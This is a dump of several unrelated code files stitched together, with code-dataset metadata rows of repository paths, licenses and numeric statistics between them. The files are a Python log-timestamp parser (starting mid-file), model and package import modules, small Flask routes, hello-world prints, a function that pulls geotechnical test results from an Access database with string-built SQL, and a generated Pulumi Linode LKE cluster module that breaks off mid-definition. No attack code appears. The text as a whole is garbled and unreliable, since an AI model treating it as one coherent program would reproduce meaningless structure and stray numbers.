    no year, strptime defaults tm_year to 1900, which ``time.mktime``
    rejects on some platforms, so such times are rebased to 2001.
    """

    # Parsed time of the first successfully parsed line (None until then).
    first_time = None
    # Parsed time of the most recently parsed line (None until then).
    previous_time = None

    def __init__(self):
        """
        Empty __init__ -method; state starts from the class-level defaults.
        """
        pass

    def parse_logs(self, log_arr, time_format, zero_pad=True):
        """
        Function that parses a log-array as given by cli_input.CliInput. Returns a list of tuples from _parse_line_.
        """
        return [self.parse_line(line, time_format, zero_pad) for line in log_arr]

    def _parse_time(self, line, time_format):
        """
        Parse the timestamp at the start of *line*.

        First tries to parse the whole line; when strptime complains about
        trailing text, the unconverted suffix reported in the exception
        message is stripped off and the remaining prefix is parsed again.
        Raises ValueError when no timestamp can be extracted.
        """
        try:
            parsed = time.strptime(line, time_format)
        except ValueError as err:
            # err.args[0] is "unconverted data remains: <suffix>"; the
            # suffix itself starts at character 26 of the message.
            suffix = err.args[0][26:]
            parsed = time.strptime(line.split(suffix)[0], time_format)
        if parsed.tm_year == 1900:
            # Format had no year: rebase to 2001 so mktime() accepts it.
            parsed = time.struct_time((2001, parsed.tm_mon, parsed.tm_mday,
                                       parsed.tm_hour, parsed.tm_min,
                                       parsed.tm_sec, parsed.tm_wday,
                                       parsed.tm_yday, parsed.tm_isdst))
        return parsed

    def get_diff(self, line, time_format, zero_pad=True):
        """
        Parses a single line from a log-array. Returns the difference in time from the previous line
        (in seconds), or None when the timestamp cannot be parsed.
        """
        if zero_pad:
            line = line.zfill(2)
        try:
            msg_time = self._parse_time(line, time_format)
        except ValueError:
            return None
        if self.first_time is None and self.previous_time is None:
            self.first_time = msg_time
            self.previous_time = msg_time
        time_diff_from_previous = time.mktime(msg_time) - time.mktime(self.previous_time)
        self.previous_time = msg_time
        return time_diff_from_previous

    def parse_line(self, line, time_format, zero_pad=True):
        """
        Parses a single line from a log-array. Returns the tuple [time from first line] [time from last line] : [line's contents]
        or None when the timestamp cannot be parsed.
        """
        orig_line = line
        if zero_pad:
            line = line.zfill(2)
        try:
            msg_time = self._parse_time(line, time_format)
        except ValueError:
            return None
        if self.first_time is None and self.previous_time is None:
            self.first_time = msg_time
            self.previous_time = msg_time
        time_diff_from_begin = time.mktime(msg_time) - time.mktime(self.first_time)
        time_diff_from_previous = time.mktime(msg_time) - time.mktime(self.previous_time)
        self.previous_time = msg_time
        return (datetime.timedelta(seconds=time_diff_from_begin),
                datetime.timedelta(seconds=time_diff_from_previous),
                orig_line)
| 29.877193
| 181
| 0.716089
| 566
| 3,406
| 3.977032
| 0.157244
| 0.214571
| 0.143936
| 0.037317
| 0.802754
| 0.768992
| 0.737006
| 0.687694
| 0.687694
| 0.687694
| 0
| 0.014963
| 0.175866
| 3,406
| 114
| 182
| 29.877193
| 0.786961
| 0
| 0
| 0.756757
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.013514
| 0.027027
| null | null | 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b111eda27fab665ec115875e9db3960414b8edeb
| 266
|
py
|
Python
|
built-in/TensorFlow/Official/cv/image_classification/GoogleNet_for_TensorFlow/inception/inception.py
|
Huawei-Ascend/modelzoo
|
df51ed9c1d6dbde1deef63f2a037a369f8554406
|
[
"Apache-2.0"
] | null | null | null |
built-in/TensorFlow/Official/cv/image_classification/GoogleNet_for_TensorFlow/inception/inception.py
|
Huawei-Ascend/modelzoo
|
df51ed9c1d6dbde1deef63f2a037a369f8554406
|
[
"Apache-2.0"
] | 3
|
2021-03-31T20:15:40.000Z
|
2022-02-09T23:50:46.000Z
|
built-in/TensorFlow/Official/cv/image_classification/GoogleNet_for_TensorFlow/inception/inception.py
|
Huawei-Ascend/modelzoo
|
df51ed9c1d6dbde1deef63f2a037a369f8554406
|
[
"Apache-2.0"
] | null | null | null |
from .inception_v1 import inception_v1
from .inception_v1 import inception_v1_arg_scope
from .inception_v1 import inception_v1_base
from .inception_v4 import inception_v4
from .inception_v4 import inception_v4_arg_scope
from .inception_v4 import inception_v4_base
| 29.555556
| 48
| 0.879699
| 42
| 266
| 5.142857
| 0.190476
| 0.361111
| 0.208333
| 0.291667
| 0.888889
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0.05
| 0.097744
| 266
| 8
| 49
| 33.25
| 0.85
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
b121e6cc0e778516760a8bcc6566a70132bd28a4
| 294
|
py
|
Python
|
project/carlos/routes.py
|
ArturoMorales93/Plataformas_II_Project
|
7dd54c8c5159a1eb8c761a3a8e4f4bfb96a078eb
|
[
"Unlicense"
] | 1
|
2021-01-29T15:16:49.000Z
|
2021-01-29T15:16:49.000Z
|
project/carlos/routes.py
|
ArturoMorales93/Plataformas_II_Project
|
7dd54c8c5159a1eb8c761a3a8e4f4bfb96a078eb
|
[
"Unlicense"
] | 12
|
2021-02-01T20:31:31.000Z
|
2021-04-15T07:34:54.000Z
|
project/carlos/routes.py
|
ArturoMorales93/Plataformas_II_Project
|
7dd54c8c5159a1eb8c761a3a8e4f4bfb96a078eb
|
[
"Unlicense"
] | 1
|
2021-03-08T23:34:37.000Z
|
2021-03-08T23:34:37.000Z
|
from flask import render_template
from . import carlos
@carlos.route('/es/iot', methods=['GET'])
@carlos.route('/iot', methods=['GET'])
def iot_es():
    """Render the Spanish IoT page; also serves as the default for /iot."""
    template_name = 'es_iot.html'
    return render_template(template_name)
@carlos.route('/en/iot', methods=['GET'])
def iot_en():
    """Render the English IoT page."""
    template_name = 'en_iot.html'
    return render_template(template_name)
| 21
| 41
| 0.687075
| 43
| 294
| 4.534884
| 0.348837
| 0.215385
| 0.2
| 0.164103
| 0.194872
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115646
| 294
| 13
| 42
| 22.615385
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| true
| 0
| 0.222222
| 0.222222
| 0.666667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
b1491c48f541fa113534a4f7535e9a398435f37a
| 57
|
py
|
Python
|
1.py
|
qq861078848/testgit
|
6f5199e7c086f428903233073188840c71269853
|
[
"MIT"
] | null | null | null |
1.py
|
qq861078848/testgit
|
6f5199e7c086f428903233073188840c71269853
|
[
"MIT"
] | null | null | null |
1.py
|
qq861078848/testgit
|
6f5199e7c086f428903233073188840c71269853
|
[
"MIT"
] | null | null | null |
# Emit two greeting lines followed by a numeric test line.
for _message in ("hello world", "hello world", "22222"):
    print(_message)
| 14.25
| 20
| 0.701754
| 8
| 57
| 5
| 0.5
| 0.5
| 0.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096154
| 0.087719
| 57
| 3
| 21
| 19
| 0.673077
| 0
| 0
| 0.666667
| 0
| 0
| 0.473684
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
b1948a8d85855dac9863c13dff560137403a3dcd
| 168
|
py
|
Python
|
snake_rl/utils/__init__.py
|
alex-petrenko/snake-rl
|
ca7000120985da7fcac4047747ad7937693abcfe
|
[
"MIT"
] | 1
|
2021-08-28T10:37:33.000Z
|
2021-08-28T10:37:33.000Z
|
snake_rl/utils/__init__.py
|
dre2004/snake-rl
|
ca7000120985da7fcac4047747ad7937693abcfe
|
[
"MIT"
] | null | null | null |
snake_rl/utils/__init__.py
|
dre2004/snake-rl
|
ca7000120985da7fcac4047747ad7937693abcfe
|
[
"MIT"
] | 1
|
2021-02-18T00:22:40.000Z
|
2021-02-18T00:22:40.000Z
|
from snake_rl.utils.vec import Vec
from snake_rl.utils.monitor import Monitor
from snake_rl.utils.logs import init_logger
from snake_rl.utils.numpy_utils import imshow
| 33.6
| 45
| 0.857143
| 30
| 168
| 4.6
| 0.4
| 0.26087
| 0.318841
| 0.463768
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 168
| 4
| 46
| 42
| 0.907895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b1a8b7f94d4e922a43da3d18a9033014726c88f6
| 3,624
|
py
|
Python
|
extract.py
|
pduebel/geodasy-tests-generator
|
1851ba9e7be0a379b29da0fbd851e0bc58d49ddf
|
[
"MIT"
] | null | null | null |
extract.py
|
pduebel/geodasy-tests-generator
|
1851ba9e7be0a379b29da0fbd851e0bc58d49ddf
|
[
"MIT"
] | null | null | null |
extract.py
|
pduebel/geodasy-tests-generator
|
1851ba9e7be0a379b29da0fbd851e0bc58d49ddf
|
[
"MIT"
] | null | null | null |
def extract(db_file, test, proj):
    """Extract in-situ test results for one project from a Microsoft Access
    (.mdb) ground-investigation database.

    Parameters:
        db_file: path to the .mdb database file.
        test: test type -- "SPT" (SPT table), "SHDP"/"DP" (DPROBE table),
            or "HP"/"SV" (TRIALPIT table, hand penetrometer / shear vane).
        proj: PROJ_ID value used to filter records.

    Returns:
        (final_holes, final_test_data): final_holes is a list of
        single-element lists [HOLE_ID]; final_test_data holds, per hole,
        a list of [depth, value] rows.  Both are empty for an unrecognized
        `test` (the original raised NameError in that case).
    """
    import pyodbc

    # Trial-pit test-type codes, including the '>', '<' and spaced
    # variants present in the data.
    tpit_codes = {
        "HP": ('HP', 'P', 'HP>', 'HP<', 'HP >', 'HP <', 'H', 'H>', 'H >',
               'H<', 'H <', 'P>', 'P >', 'P<', 'P <'),
        "SV": ('SV', 'V', 'SV>', 'SV<', 'SV >', 'SV <', 'S', 'S>', 'S >',
               'S<', 'S <', 'V>', 'V >', 'V<', 'V <'),
    }

    odbc_conn_str = 'DRIVER={Microsoft Access Driver (*.mdb)};DBQ=%s;' % (db_file)
    conn = pyodbc.connect(odbc_conn_str)
    cursor = conn.cursor()

    def _rows(sql, params):
        # Run a parameterized query ('?' placeholders -- avoids SQL
        # injection through proj / hole IDs) and return rows as lists.
        cursor.execute(sql, params)
        return [list(row) for row in cursor.fetchall()]

    def _holes(table):
        # Distinct hole IDs for this project.  `table` is always one of
        # the fixed literals below, never caller-supplied text.
        return _rows("select distinct HOLE_ID from %s where PROJ_ID=?" % table,
                     (proj,))

    final_holes = []       # initialized up front so unknown `test` returns empty
    final_test_data = []

    if test == "SPT":
        final_holes = _holes("SPT")
        for hole in final_holes:
            final_test_data.append(_rows(
                "select SPT_BASE, SPT_N from SPT where HOLE_ID=? and PROJ_ID=?",
                (hole[0], proj)))

    if test == "SHDP" or test == "DP":
        final_holes = _holes("DPROBE")
        for hole in final_holes:
            final_test_data.append(_rows(
                "select DPSTART, BLOWS from DPROBE where HOLE_ID=? and PROJ_ID=?",
                (hole[0], proj)))

    if test == "SV" or test == "HP":
        final_holes = _holes("TRIALPIT")
        codes = tpit_codes[test]
        condition = " or ".join(["TPIT_TEST_TYPE=?"] * len(codes))
        sql = ("select TPIT_TEST_DEPTH, TPIT_AVERAGE_DFLT from TRIALPIT "
               "where (%s) and HOLE_ID=? and PROJ_ID=?" % condition)
        for hole in final_holes:
            final_test_data.append(_rows(sql, codes + (hole[0], proj)))

    cursor.commit()   # kept from the original; SELECTs have nothing to commit
    conn.close()      # fix: the connection was previously leaked
    return final_holes, final_test_data
| 42.139535
| 126
| 0.554912
| 498
| 3,624
| 3.76506
| 0.124498
| 0.136533
| 0.192
| 0.209067
| 0.850133
| 0.850133
| 0.850133
| 0.795733
| 0.7792
| 0.7632
| 0
| 0.001643
| 0.328091
| 3,624
| 85
| 127
| 42.635294
| 0.768378
| 0
| 0
| 0.540984
| 0
| 0
| 0.45344
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016393
| false
| 0
| 0.016393
| 0
| 0.04918
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
492b9ee09e4de3543a88bdab1c0ca9eeea226c4e
| 19,340
|
py
|
Python
|
sdk/python/pulumi_linode/lke_cluster.py
|
pulumi/pulumi-linode
|
dcdc078ddcad836dddf6f31879f0f0488bec33b4
|
[
"ECL-2.0",
"Apache-2.0"
] | 18
|
2019-05-02T21:14:37.000Z
|
2021-12-19T18:37:40.000Z
|
sdk/python/pulumi_linode/lke_cluster.py
|
pulumi/pulumi-linode
|
dcdc078ddcad836dddf6f31879f0f0488bec33b4
|
[
"ECL-2.0",
"Apache-2.0"
] | 79
|
2019-05-01T17:52:03.000Z
|
2022-03-31T15:31:56.000Z
|
sdk/python/pulumi_linode/lke_cluster.py
|
pulumi/pulumi-linode
|
dcdc078ddcad836dddf6f31879f0f0488bec33b4
|
[
"ECL-2.0",
"Apache-2.0"
] | 6
|
2019-05-02T00:37:23.000Z
|
2021-05-04T11:10:40.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['LkeClusterArgs', 'LkeCluster']
@pulumi.input_type
class LkeClusterArgs:
    # NOTE: generated by the Pulumi Terraform Bridge (tfgen) -- do not edit
    # by hand.  Required/optional input arguments for creating an
    # LkeCluster resource; values live in pulumi's field store, accessed
    # through pulumi.get/pulumi.set.
    def __init__(__self__, *,
                 k8s_version: pulumi.Input[str],
                 label: pulumi.Input[str],
                 pools: pulumi.Input[Sequence[pulumi.Input['LkeClusterPoolArgs']]],
                 region: pulumi.Input[str],
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        The set of arguments for constructing a LkeCluster resource.
        :param pulumi.Input[str] k8s_version: The desired Kubernetes version for this Kubernetes cluster in the format of `major.minor` (e.g. `1.17`), and the latest supported patch version will be deployed.
        :param pulumi.Input[str] label: This Kubernetes cluster's unique label.
        :param pulumi.Input[Sequence[pulumi.Input['LkeClusterPoolArgs']]] pools: Additional nested attributes:
        :param pulumi.Input[str] region: This Kubernetes cluster's location.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: An array of tags applied to the Kubernetes cluster. Tags are for organizational purposes only.
        """
        pulumi.set(__self__, "k8s_version", k8s_version)
        pulumi.set(__self__, "label", label)
        pulumi.set(__self__, "pools", pools)
        pulumi.set(__self__, "region", region)
        # tags is optional: only stored when supplied.
        if tags is not None:
            pulumi.set(__self__, "tags", tags)

    # The property pairs below simply proxy pulumi.get / pulumi.set for
    # each input field.
    @property
    @pulumi.getter(name="k8sVersion")
    def k8s_version(self) -> pulumi.Input[str]:
        """
        The desired Kubernetes version for this Kubernetes cluster in the format of `major.minor` (e.g. `1.17`), and the latest supported patch version will be deployed.
        """
        return pulumi.get(self, "k8s_version")

    @k8s_version.setter
    def k8s_version(self, value: pulumi.Input[str]):
        pulumi.set(self, "k8s_version", value)

    @property
    @pulumi.getter
    def label(self) -> pulumi.Input[str]:
        """
        This Kubernetes cluster's unique label.
        """
        return pulumi.get(self, "label")

    @label.setter
    def label(self, value: pulumi.Input[str]):
        pulumi.set(self, "label", value)

    @property
    @pulumi.getter
    def pools(self) -> pulumi.Input[Sequence[pulumi.Input['LkeClusterPoolArgs']]]:
        """
        Additional nested attributes:
        """
        return pulumi.get(self, "pools")

    @pools.setter
    def pools(self, value: pulumi.Input[Sequence[pulumi.Input['LkeClusterPoolArgs']]]):
        pulumi.set(self, "pools", value)

    @property
    @pulumi.getter
    def region(self) -> pulumi.Input[str]:
        """
        This Kubernetes cluster's location.
        """
        return pulumi.get(self, "region")

    @region.setter
    def region(self, value: pulumi.Input[str]):
        pulumi.set(self, "region", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        An array of tags applied to the Kubernetes cluster. Tags are for organizational purposes only.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)
@pulumi.input_type
class _LkeClusterState:
    # NOTE: generated by the Pulumi Terraform Bridge (tfgen) -- do not edit
    # by hand.  State inputs for looking up / filtering existing LkeCluster
    # resources; unlike LkeClusterArgs, every field here is optional.
    def __init__(__self__, *,
                 api_endpoints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 k8s_version: Optional[pulumi.Input[str]] = None,
                 kubeconfig: Optional[pulumi.Input[str]] = None,
                 label: Optional[pulumi.Input[str]] = None,
                 pools: Optional[pulumi.Input[Sequence[pulumi.Input['LkeClusterPoolArgs']]]] = None,
                 region: Optional[pulumi.Input[str]] = None,
                 status: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        Input properties used for looking up and filtering LkeCluster resources.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] api_endpoints: The endpoints for the Kubernetes API server.
        :param pulumi.Input[str] k8s_version: The desired Kubernetes version for this Kubernetes cluster in the format of `major.minor` (e.g. `1.17`), and the latest supported patch version will be deployed.
        :param pulumi.Input[str] kubeconfig: The base64 encoded kubeconfig for the Kubernetes cluster.
        :param pulumi.Input[str] label: This Kubernetes cluster's unique label.
        :param pulumi.Input[Sequence[pulumi.Input['LkeClusterPoolArgs']]] pools: Additional nested attributes:
        :param pulumi.Input[str] region: This Kubernetes cluster's location.
        :param pulumi.Input[str] status: The status of the node. (`ready`, `not_ready`)
        :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: An array of tags applied to the Kubernetes cluster. Tags are for organizational purposes only.
        """
        # Only store the fields that were actually provided.
        if api_endpoints is not None:
            pulumi.set(__self__, "api_endpoints", api_endpoints)
        if k8s_version is not None:
            pulumi.set(__self__, "k8s_version", k8s_version)
        if kubeconfig is not None:
            pulumi.set(__self__, "kubeconfig", kubeconfig)
        if label is not None:
            pulumi.set(__self__, "label", label)
        if pools is not None:
            pulumi.set(__self__, "pools", pools)
        if region is not None:
            pulumi.set(__self__, "region", region)
        if status is not None:
            pulumi.set(__self__, "status", status)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)

    # The property pairs below simply proxy pulumi.get / pulumi.set for
    # each state field.
    @property
    @pulumi.getter(name="apiEndpoints")
    def api_endpoints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        The endpoints for the Kubernetes API server.
        """
        return pulumi.get(self, "api_endpoints")

    @api_endpoints.setter
    def api_endpoints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "api_endpoints", value)

    @property
    @pulumi.getter(name="k8sVersion")
    def k8s_version(self) -> Optional[pulumi.Input[str]]:
        """
        The desired Kubernetes version for this Kubernetes cluster in the format of `major.minor` (e.g. `1.17`), and the latest supported patch version will be deployed.
        """
        return pulumi.get(self, "k8s_version")

    @k8s_version.setter
    def k8s_version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "k8s_version", value)

    @property
    @pulumi.getter
    def kubeconfig(self) -> Optional[pulumi.Input[str]]:
        """
        The base64 encoded kubeconfig for the Kubernetes cluster.
        """
        return pulumi.get(self, "kubeconfig")

    @kubeconfig.setter
    def kubeconfig(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "kubeconfig", value)

    @property
    @pulumi.getter
    def label(self) -> Optional[pulumi.Input[str]]:
        """
        This Kubernetes cluster's unique label.
        """
        return pulumi.get(self, "label")

    @label.setter
    def label(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "label", value)

    @property
    @pulumi.getter
    def pools(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['LkeClusterPoolArgs']]]]:
        """
        Additional nested attributes:
        """
        return pulumi.get(self, "pools")

    @pools.setter
    def pools(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['LkeClusterPoolArgs']]]]):
        pulumi.set(self, "pools", value)

    @property
    @pulumi.getter
    def region(self) -> Optional[pulumi.Input[str]]:
        """
        This Kubernetes cluster's location.
        """
        return pulumi.get(self, "region")

    @region.setter
    def region(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "region", value)

    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        """
        The status of the node. (`ready`, `not_ready`)
        """
        return pulumi.get(self, "status")

    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        An array of tags applied to the Kubernetes cluster. Tags are for organizational purposes only.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)
class LkeCluster(pulumi.CustomResource):
    # Pulumi resource wrapper for a Linode Kubernetes Engine (LKE) cluster.
    # Construction is dispatched between two overloads: keyword arguments, or
    # a single LkeClusterArgs bundle.

    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 k8s_version: Optional[pulumi.Input[str]] = None,
                 label: Optional[pulumi.Input[str]] = None,
                 pools: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LkeClusterPoolArgs']]]]] = None,
                 region: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 __props__=None):
        """
        Manages an LKE cluster.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_linode as linode

        my_cluster = linode.LkeCluster("my-cluster",
            k8s_version="1.20",
            label="my-cluster",
            pools=[linode.LkeClusterPoolArgs(
                count=3,
                type="g6-standard-2",
            )],
            region="us-central",
            tags=["prod"])
        ```

        ## Import

        LKE Clusters can be imported using the `id`, e.g.

        ```sh
        $ pulumi import linode:index/lkeCluster:LkeCluster my_cluster 12345
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] k8s_version: The desired Kubernetes version for this Kubernetes cluster in the format of `major.minor` (e.g. `1.17`), and the latest supported patch version will be deployed.
        :param pulumi.Input[str] label: This Kubernetes cluster's unique label.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LkeClusterPoolArgs']]]] pools: Additional nested attributes:
        :param pulumi.Input[str] region: This Kubernetes cluster's location.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: An array of tags applied to the Kubernetes cluster. Tags are for organizational purposes only.
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: LkeClusterArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages an LKE cluster.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_linode as linode

        my_cluster = linode.LkeCluster("my-cluster",
            k8s_version="1.20",
            label="my-cluster",
            pools=[linode.LkeClusterPoolArgs(
                count=3,
                type="g6-standard-2",
            )],
            region="us-central",
            tags=["prod"])
        ```

        ## Import

        LKE Clusters can be imported using the `id`, e.g.

        ```sh
        $ pulumi import linode:index/lkeCluster:LkeCluster my_cluster 12345
        ```

        :param str resource_name: The name of the resource.
        :param LkeClusterArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Resolve which overload the caller used, then forward to the real
        # initializer with plain keyword arguments.
        resource_args, opts = _utilities.get_resource_args_opts(LkeClusterArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       k8s_version: Optional[pulumi.Input[str]] = None,
                       label: Optional[pulumi.Input[str]] = None,
                       pools: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LkeClusterPoolArgs']]]]] = None,
                       region: Optional[pulumi.Input[str]] = None,
                       tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                       __props__=None):
        # Shared initializer used by both __init__ overloads. Validates the
        # resource options, enforces required inputs, and registers the
        # resource with the Pulumi engine.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: build the input property bag.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = LkeClusterArgs.__new__(LkeClusterArgs)

            # Inputs are required unless the resource is being rehydrated
            # from an existing URN.
            if k8s_version is None and not opts.urn:
                raise TypeError("Missing required property 'k8s_version'")
            __props__.__dict__["k8s_version"] = k8s_version
            if label is None and not opts.urn:
                raise TypeError("Missing required property 'label'")
            __props__.__dict__["label"] = label
            if pools is None and not opts.urn:
                raise TypeError("Missing required property 'pools'")
            __props__.__dict__["pools"] = pools
            if region is None and not opts.urn:
                raise TypeError("Missing required property 'region'")
            __props__.__dict__["region"] = region
            __props__.__dict__["tags"] = tags
            # Output-only properties start unset; the provider fills them in.
            __props__.__dict__["api_endpoints"] = None
            __props__.__dict__["kubeconfig"] = None
            __props__.__dict__["status"] = None
        super(LkeCluster, __self__).__init__(
            'linode:index/lkeCluster:LkeCluster',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            api_endpoints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            k8s_version: Optional[pulumi.Input[str]] = None,
            kubeconfig: Optional[pulumi.Input[str]] = None,
            label: Optional[pulumi.Input[str]] = None,
            pools: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LkeClusterPoolArgs']]]]] = None,
            region: Optional[pulumi.Input[str]] = None,
            status: Optional[pulumi.Input[str]] = None,
            tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'LkeCluster':
        """
        Get an existing LkeCluster resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] api_endpoints: The endpoints for the Kubernetes API server.
        :param pulumi.Input[str] k8s_version: The desired Kubernetes version for this Kubernetes cluster in the format of `major.minor` (e.g. `1.17`), and the latest supported patch version will be deployed.
        :param pulumi.Input[str] kubeconfig: The base64 encoded kubeconfig for the Kubernetes cluster.
        :param pulumi.Input[str] label: This Kubernetes cluster's unique label.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LkeClusterPoolArgs']]]] pools: Additional nested attributes:
        :param pulumi.Input[str] region: This Kubernetes cluster's location.
        :param pulumi.Input[str] status: The status of the node. (`ready`, `not_ready`)
        :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: An array of tags applied to the Kubernetes cluster. Tags are for organizational purposes only.
        """
        # Attach the provider id so the engine performs a lookup rather than
        # a create, then seed the state bag with any caller-supplied values.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _LkeClusterState.__new__(_LkeClusterState)

        __props__.__dict__["api_endpoints"] = api_endpoints
        __props__.__dict__["k8s_version"] = k8s_version
        __props__.__dict__["kubeconfig"] = kubeconfig
        __props__.__dict__["label"] = label
        __props__.__dict__["pools"] = pools
        __props__.__dict__["region"] = region
        __props__.__dict__["status"] = status
        __props__.__dict__["tags"] = tags
        return LkeCluster(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="apiEndpoints")
